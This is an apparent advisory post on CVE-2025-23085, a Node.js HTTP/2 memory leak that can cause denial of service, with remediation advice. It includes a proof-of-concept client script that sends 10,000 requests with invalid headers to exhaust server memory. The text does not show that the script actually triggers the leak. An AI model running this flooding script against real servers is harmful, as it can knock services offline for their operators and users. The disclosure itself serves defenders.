A newly disclosed vulnerability, tracked as CVE-2025-23085, has been identified in the Node.js HTTP/2 server. The flaw causes a memory leak when a remote peer unexpectedly closes the socket without sending a GOAWAY frame. The same leak occurs when nghttp2 detects an invalid header and the connection is consequently terminated by the peer. The result is increased memory consumption and, under certain conditions, a potential denial of service (DoS).
Affected versions of Node.js HTTP/2 Server include v18.x, v20.x, v22.x, and v23.x. This post will provide a detailed analysis of the vulnerability, including code snippets, exploit details, and links to original references, to help Node.js users understand, assess, and mitigate the risk.
Code Snippet Demonstrating the Flaw
The flaw occurs when a remote peer terminates the connection unexpectedly. Consider the following code snippet as an example:
const http2 = require('http2');
const server = http2.createServer();
server.on('stream', (stream, headers) => {
  stream.respond({
    ':status': 200,
    'content-type': 'text/html'
  });
  stream.end('<h1>Hello World</h1>');
});
server.listen(300, () => {
  console.log('HTTP/2 Server is listening on port 300');
});
In this example, a simple HTTP/2 server listens on port 300 and responds to every request with a "Hello World" message. If the server encounters an invalid header, or if the remote peer closes the socket abruptly without sending a GOAWAY frame, the memory leak may occur.
Exploit Details
An attacker could exploit this vulnerability by sending a large number of crafted requests to the vulnerable Node.js HTTP/2 server, causing it to consume a significant amount of memory. If the server cannot release the consumed memory quickly enough, this could cause the server to crash or become unresponsive, resulting in a denial of service.
Here is an example of a malicious client sending specially crafted requests:
const http2 = require('http2');
const client = http2.connect('http://localhost:300');
for (let i = 0; i < 10000; i++) {
  const req = client.request({ [i]: 'invalid header value' });
  req.end();
  req.on('response', (headers) => {});
  req.on('end', () => {
    if (i % 100 === 0) {
      console.log(`Request ${i} completed.`);
    }
  });
}
This script sends 10,000 requests to the server, each with an invalid header that triggers the memory leak.
Remediation and Mitigation
Users running Node.js v18.x, v20.x, v22.x or v23.x should update to the latest release of their line, since these lines are affected by this vulnerability. Patched releases have been published for each of them.
In addition, users should ensure that monitoring and alerting are in place to detect unusual memory consumption or denial-of-service activity.
Links to patch releases
- Node.js v18.x Patch
- Node.js v20.x Patch
- Node.js v22.x Patch
- Node.js v23.x Patch
Conclusion
CVE-2025-23085 poses a significant risk to Node.js HTTP/2 servers, since exploitation can produce memory leaks and ultimately a denial of service. Users are urged to update their servers to the latest available releases to mitigate the risk, and to put monitoring and alerting in place to detect and respond to unusual memory consumption or attack traffic.
Timeline
Published on: 02/07/2025 07:15:15 UTC
Last modified on: 02/07/2025 16:15:40 UTC